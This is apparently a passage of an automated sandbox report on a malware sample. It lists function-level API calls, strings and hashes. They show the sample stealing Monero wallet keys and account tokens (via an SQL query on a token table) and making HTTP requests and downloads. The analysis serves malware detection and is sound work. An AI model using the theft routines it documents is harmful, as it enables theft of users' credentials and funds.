                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 004045FA
                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02DD5140), ref: 00404AA8
                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                      • HttpOpenRequestA.WININET(00000000,02DD5050,?,02DD9608,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                      • String ID: "$"$------$------$------
                                                                                                      • API String ID: 460715078-2180234286
                                                                                                      • Opcode ID: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
                                                                                                      • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                      • Opcode Fuzzy Hash: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
                                                                                                      • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,02DD5B60,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                      • String ID: - $%s\%s$?
                                                                                                      • API String ID: 3246050789-3278919252
                                                                                                      • Opcode ID: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
                                                                                                      • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                      • Opcode Fuzzy Hash: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
                                                                                                      • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • strtok_s.MSVCRT ref: 0040F667
                                                                                                      • strtok_s.MSVCRT ref: 0040FA8F
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: strtok_s$lstrcpylstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 348468850-0
                                                                                                      • Opcode ID: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
                                                                                                      • Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
                                                                                                      • Opcode Fuzzy Hash: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
                                                                                                      • Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004012E7
                                                                                                        • Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                        • Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                        • Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                        • Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                        • Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040130F
                                                                                                      • lstrlen.KERNEL32(?), ref: 0040131C
                                                                                                      • lstrcat.KERNEL32(?,.keys), ref: 00401337
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                        • Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 004014A9
                                                                                                      • memset.MSVCRT ref: 004014D0
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$CopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
                                                                                                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                      • API String ID: 330749937-218353709
                                                                                                      • Opcode ID: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
                                                                                                      • Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
                                                                                                      • Opcode Fuzzy Hash: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
                                                                                                      • Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                      • wsprintfA.USER32 ref: 004142DD
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                      • String ID: :$C$\
                                                                                                      • API String ID: 3790021787-3809124531
                                                                                                      • Opcode ID: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
                                                                                                      • Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
                                                                                                      • Opcode Fuzzy Hash: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
                                                                                                      • Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                      • ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                      • LocalFree.KERNEL32('@), ref: 00409470
                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040947A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                      • String ID: '@$'@
                                                                                                      • API String ID: 2311089104-345573653
                                                                                                      • Opcode ID: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
                                                                                                      • Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
                                                                                                      • Opcode Fuzzy Hash: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
                                                                                                      • Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02DD7F90,00000000,?,0041D774,00000000,?,00000000,00000000,?,02DD81E8), ref: 0041496D
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                      • __aulldiv.LIBCMT ref: 004149AF
                                                                                                      • __aulldiv.LIBCMT ref: 004149BD
                                                                                                      • wsprintfA.USER32 ref: 004149E9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                      • String ID: %d MB$@
                                                                                                      • API String ID: 2886426298-3474575989
                                                                                                      • Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                      • Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
                                                                                                      • Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
                                                                                                      • Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                      • InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
                                                                                                      • StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00405DE7
                                                                                                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
                                                                                                      • InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
                                                                                                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00405EE9
                                                                                                      • InternetCloseHandle.WININET(00410E73), ref: 00405EF3
                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405F00
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2507841554-0
                                                                                                      • Opcode ID: aa8a7716d2caebc3f0fee95ec8f8c2674a5549ba908356bdff9b12537e65a0fb
                                                                                                      • Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
                                                                                                      • Opcode Fuzzy Hash: aa8a7716d2caebc3f0fee95ec8f8c2674a5549ba908356bdff9b12537e65a0fb
                                                                                                      • Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                      • API String ID: 2910778473-1079375795
                                                                                                      • Opcode ID: 3ab50779078bee03c147ab3ccd8c1bd2ae9931293fdb012c668c514da9b46b46
                                                                                                      • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                      • Opcode Fuzzy Hash: 3ab50779078bee03c147ab3ccd8c1bd2ae9931293fdb012c668c514da9b46b46
                                                                                                      • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD8200,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                      • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD7F48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414DA5
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                      • String ID: %s\%s
                                                                                                      • API String ID: 3896182533-4073750446
                                                                                                      • Opcode ID: 523a87c804e1029e1ba3480052583fc70d0894c5bac8d273530debff4ee2d655
                                                                                                      • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                      • Opcode Fuzzy Hash: 523a87c804e1029e1ba3480052583fc70d0894c5bac8d273530debff4ee2d655
                                                                                                      • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
